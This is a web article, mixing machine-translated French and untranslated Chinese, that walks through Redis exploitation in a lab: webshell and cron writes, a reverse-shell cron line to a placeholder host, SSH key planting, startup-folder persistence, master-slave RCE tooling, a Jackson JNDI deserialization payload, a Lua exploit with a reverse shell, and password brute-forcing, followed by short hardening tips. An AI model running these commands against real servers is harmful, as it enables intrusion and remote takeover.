Maison > base de données > Redis > le corps du texte

Exemple d'analyse de l'exploitation de la vulnérabilité Redis

PHPz
Libérer: 2023-05-28 20:08:19
avant
1759 Les gens l'ont consulté

1. Avant-propos

Les vulnérabilités liées à Redis existent depuis longtemps, et il existe encore des scénarios qui peuvent être exploités. Cette fois, nous allons trier et reproduire les exploits de vulnérabilités liés à Redis afin de pouvoir établir rapidement des idées d'exploitation. en les rencontrant dans le futur.

2. Introduction à redis

redis est un système de stockage clé-valeur. Semblable à Memcached, il prend en charge relativement plus de types de valeurs stockées, notamment string (string), list (liste chaînée), set (**), zset (ensemble trié - ordonné **) et hash (type de hachage) .
Redis compense largement les défauts du stockage clé/valeur tel que memcached, et peut jouer un très bon rôle supplémentaire aux bases de données relationnelles dans certaines situations. Il fournit Java, C/C++, C#, PHP, JavaScript, Perl, Object-C, Python, Ruby, Erlang et d'autres clients, ce qui est très pratique à utiliser.
Redis prend en charge la synchronisation maître-esclave. Les données peuvent être synchronisées du serveur maître vers n'importe quel nombre de serveurs esclaves, et le serveur esclave peut être un serveur maître associé à d'autres serveurs esclaves.
Port par défaut : 6379

3. Configuration de l'environnement

Créez des environnements de test pour Windows et Linux respectivement.
La dernière version officielle de Redis pour Windows est la 3.x.
Adresse de téléchargement Windows :
https://github.com/microsoftarchive/redis/releases
Téléchargez Redis-x64-3.2.100.zip et extrayez-le dans le répertoire local.

Exemple danalyse de lexploitation de la vulnérabilité Redis

Modifiez le fichier de configuration redis.windows.conf, activez l'accès à distance et désactivez le mode protégé.
Modifiez la liaison 127.0.0.1 pour lier 0.0.0.0
Modifiez le mode protégé oui en mode protégé non

Exemple danalyse de lexploitation de la vulnérabilité Redis

Spécifiez le fichier de configuration redis.windows.conf et démarrez le service redis.

redis-server.exe  redis.windows.conf
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

Utilisez redis-cli.exe pour vous connecter avec succès au service redis.

Exemple danalyse de lexploitation de la vulnérabilité Redis

Adresse de téléchargement Linux :
La dernière version est la 6.0.1, vous pouvez choisir la version que vous devez télécharger.
http://download.redis.io/releases/redis-6.0.1.tar.gz
Utilisez la commande wget pour télécharger

$ wget http://download.redis.io/releases/redis-6.0.1.tar.gz
$ tar xzf redis-6.0.1.tar.gz
$ cd redis-6.0.1$ make
Copier après la connexion

Après la compilation, entrez dans le répertoire src et copiez redis-server et redis-cli dans /usr /

cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ../
ls
cp redis.conf /etc/
Copier après la connexion

Modifiez redis.conf dans le répertoire bin pour qu'il soit identique à la configuration dans Windows, activez l'accès externe et désactivez le mode protégé.

Exemple danalyse de lexploitation de la vulnérabilité Redis

Démarrez le service Redis

redis-server  /etc/redis.conf
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

Connecté avec succès au service Redis.

redis-cli -h 172.16.86.136
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

4. Redis écrit des fichiers

Redis ne définit pas de mot de passe par défaut Si aucune restriction d'accès IP n'est définie, vous pouvez écrire des fichiers via Redis pour une exploitation associée.

4.1, écriture de webshell

Portée applicable : Windows, version Linux.
Conditions d'utilisation :
1. La cible existe dans le répertoire Web
2. Le chemin absolu du Web est connu
3 L'autorisation d'écriture existe
Processus d'utilisation :
Utilisez redis pour écrire un webshell dans le répertoire Web cible.

config set dir "C:/phpstudy_pro/WWW/web"
config set dbfilename info.php
set x "\r\n\r\n<?php  phpinfo();?>\r\n\r\n"
save
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

Si aucun saut de ligne n'est effectué, le fichier importé par Redis contient des informations de version, ce qui peut entraîner un échec d'exécution. rnrn est le symbole représentant le saut de ligne.

Exemple danalyse de lexploitation de la vulnérabilité Redis

Le fichier a été écrit avec succès.

Exemple danalyse de lexploitation de la vulnérabilité Redis

4.2. Shell de rebond de tâche planifiée

Portée d'utilisation : centos
Conditions d'utilisation :
1. Autorisation d'écrire des tâches planifiées
Processus d'utilisation :
Lorsque les autorisations sont suffisantes, utilisez redis pour écrire des fichiers dans le répertoire des tâches planifiées. ci-dessous.
Première écoute sur le port.

nc -lvp 8899
Copier après la connexion

Utilisez redis pour générer des fichiers de configuration de tâches planifiées.

config set dir /var/spool/cronset tide "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/x.x.x.x/8899 0>&1\n\n"config set dbfilename root
save
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

Tâches planifiées ajoutées avec succès sur l'hôte cible.

crontab -l
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

Exécutez une fois par minute et recevez avec succès la coque de rebond.

Exemple danalyse de lexploitation de la vulnérabilité Redis

坑点:
使用kali做为目标主机进行测试,需要写入计划任务到/var/spool/cron/crontabs目录下。
发现当目标主机为centos时可以反弹shell成功,使用了ubuntu和debian均无法成功反弹shell。
原因:由于redis向任务计划文件里写内容出现乱码而导致的语法错误,而乱码是避免不了的,centos会忽略乱码去执行格式正确的任务计划。

4.3、写入公钥远程连接

使用范围:开启了密钥认证的linux主机
利用条件:
1、root权限
2、开启了ssh密钥登录,存在/etc/.ssh文件
利用过程:
当redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录目标服务器。
1、首先在centos靶机上开启ssh密钥登录。
修改/etc/ssh/sshd_config配置文件。

RSAAuthentication设置为yes,意思是设置开启使用RSA算法的基于rhosts的安全验证;
PubkeyAuthentication设置为yes,意思是设置开启公钥验证;
AuthorizedKeyFiles后面的目录,是你上传的公钥所保存的文件;
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

重启服务

 systemctl restart sshd.service
Copier après la connexion

2、生成密钥
在kali中使用自带的命令生成一对密钥。

ssh-keygen -t rsa
Copier après la connexion

3、将公钥内容导入key.txt文件

Exemple danalyse de lexploitation de la vulnérabilité Redis

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

4、将生成的公钥内容设置给redis里的变量

cat /root/.ssh/key.txt | redis-cli -h x.x.x.x -x set tide
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

5、在 /root/.ssh 目录下生成authorized_keys文件。

redis-cli -h x.x.x.x
config set dir /root/.ssh 
config  set  dbfilename authorized_keys
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

成功写入authorized_keys文件。

Exemple danalyse de lexploitation de la vulnérabilité Redis

6、使用本地的私钥连接ssh

ssh  -o StrictHostKeyChecking=no x.x.x.x
Copier après la connexion

连接成功。

Exemple danalyse de lexploitation de la vulnérabilité Redis

坑点:
目标主机必须开启了密钥登录才能利用。
ssh第一次连接时要加上 -o StrictHostKeyChecking=no,不然可能一直连不上。

4.4、开机自启目录

当目标redis部署在windows主机上时,可以写入文件到自启动目录。当下次电脑重新启动时执行上线。
使用powershell远程下载执行。
server服务器默认存在Administrator用户。
写入批处理文件到Administrator用户的开机启动目录。

config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
config set dbfilename shell.bat
save
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

5、 redis主从同步rce

使用范围redis 4.x-5.0.5
在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。

git clone https://github.com/Ridter/redis-rce.gitgit clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
Copier après la connexion

编译so文件

cd RedisModules-ExecuteCommand/
ls
make
Copier après la connexion

编译完后之后module.so到redis-rce目录下,运行命令:

python redis-rce.py -r x.x.x.x  -L x.x.x.x -f module.so
Copier après la connexion

-r参数是指目标redis IP地址
-L参数是指本机的ip地址
执行命令后,本机21000端口生成一个redis服务,然后目标redis指定本机为主服务器,同步执行so文件。
执行成功后可以选择生成一个交互的shell,或者重新反弹一个shell。

Exemple danalyse de lexploitation de la vulnérabilité Redis

6、反序列化rce

当遇到 redis 服务器写文件无法 getshell,可以查看redis数据是否符合序列化数据的特征。
序列化数据类型分辨:

jackson:关注 json 对象是不是数组,第一个元素看起来像不像类名,例如["com.blue.bean.User",xxx]
fastjson:关注有没有 @type 字段
jdk:首先看 value 是不是 base64,如果是解码后看里面有没有 java 包名
Copier après la connexion

redis 反序列化本质上不是 redis 的漏洞,而是使用 redis 的应用反序列化了 redis 的数据而引起的漏洞,redis 是一个缓存服务器,用于存储一些缓存对象,所以在很多场景下 redis 里存储的都是各种序列化后的对象数据。
两个常见场景:
一、java 程序要将用户登录后的 session 对象序列化缓存起来,这种场景是最常见的。
二、程序员经常会把 redis 和 ORM 框架整合起来,一些频繁被查询的数据就会被序列化存储到 redis 里,在被查询时就会优先从 redis 里将对象反序列化一遍。

redis一般存储的都是 java 序列化对象,php、python 比较少见,比较多的是 fastjson 和 jackson 类型的序列化数据,jdk 原生的序列化数据。
因为要从 redis 反序列化对象,在对象类型非单一或少量的情况下程序员通常会选择开启 jackson 的 defaulttyping 和 fastjson 的 autotype,所以通常可以进行利用。

fastjson反序列化和java反序列化和jackson 反序列化利用原理相同,都是通过篡改 redis 里面的反序列化数据,把恶意的序列化字节码存储进去,等到应用使用到它的时候就会反序列化触发漏洞,下面演示jackson 反序列化的利用过程。

6.1、jackson 反序列化利用

序列化:把Java对象转换为字节序列的过程。
反序列化:把字节序列恢复为Java对象的过程。
jackson 反序列化漏洞汇总
使用浅蓝大佬的springboot+redis+jackson的漏洞环境进行演示。
下载地址:https://github.com/iSafeBlue/redis-rce
首先搭建漏洞环境。
使用IDEA打开pom.xml文件,自动下载安装程序运行所需的依赖。

Exemple danalyse de lexploitation de la vulnérabilité Redis

安装完成后,运行程序。

Exemple danalyse de lexploitation de la vulnérabilité Redis本地启动一个redis。

Exemple danalyse de lexploitation de la vulnérabilité Redis

TestController.java 里写了两个接口,login 接口会把 User 对象直接存储到 redis。Home API will query Redis using the username parameter as the key.。

在“存储”和“查询”的时候实际上就是在“序列化”与“反序列化”。

这个过程如下:

调用login接口 -> 序列化User对象并存储到redis -> 调用home接口 -> 从redis取出数据并反序列化

如果控制了redis,可以先调用login接口把User 对象序列化存储到redis,然后把redis里的这条序列化数据篡改成恶意反序列化数据。最后,访问home接口时,从redis中获取数据导致了反序列化漏洞的触发。

演示过程:
访问login接口把数据存储到redis。

127.0.0.1:8080/login?username=nuoyan&password=123456
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

修改redis中的存储的数据为恶意反序列化数据,发起 JNDI 连接请求。相关rmi和jndi服务器搭建可以参考

Fastjson反序列化漏洞利用

set nuoyan "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"rmi://x.x.x.x:1098/jndi\"}]"
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

然后访问home接口,取出数据进行反序列化,成功弹出了计算器。

http://127.0.0.1:8080/home?username=nuoyan
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

7、lua rce

A-Team团队大佬提出的一种利用方法。相关细节可参考《在Redis中构建Lua虚拟机的稳定攻击路径》
适用于高权限运行低版本redis的lua虚拟机,写文件失败时进行尝试。
本地搭建了centos6.5+redis 2.6.16的实验环境
使用info server 和 eval "return _VERSION" 0 命令可以查看当前redis版本和编译信息。

Exemple danalyse de lexploitation de la vulnérabilité Redis

下载A-Team团队的exp

https://github.com/QAX-A-Team/redis_lua_exploit/

修改redis_lua.py中目标地址为靶机的ip地址。

Exemple danalyse de lexploitation de la vulnérabilité Redis

运行攻击exp。

Exemple danalyse de lexploitation de la vulnérabilité Redis

显示执行成功,可以进行命令执行了。

连接靶机redis执行反弹shell命令。

eval "tonumber('/bin/bash -i >& /dev/tcp/172.16.100.61/9999 0>&1', 8)" 0
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

成功接收到反弹的shell。

Exemple danalyse de lexploitation de la vulnérabilité Redis

8、redis密码爆破

当redis服务开放且设置了密码时,可以尝试使用工具爆破。
首先给redis设置密码,修改redis.conf,增加密码

requirepass admin@123
Copier après la connexion

Exemple danalyse de lexploitation de la vulnérabilité Redis

使用redis-cli连接,使用-a参数指定密码操作。

Exemple danalyse de lexploitation de la vulnérabilité Redis

使用msf的auxiliary/scanner/redis/redis_login模块
设置爆破的目标地址,和字典文件,不建议使用默认字典文件。

Exemple danalyse de lexploitation de la vulnérabilité Redis

成功爆破出密码为admin@123

Exemple danalyse de lexploitation de la vulnérabilité Redis

9. Corrections de vulnérabilités

1. Il est interdit d'utiliser les privilèges root pour démarrer le service Redis.
2. Activez l'authentification par mot de passe pour l'accès Redis.
3. Ajoutez des restrictions d'accès IP et modifiez le port 6379 par défaut

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:yisu.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal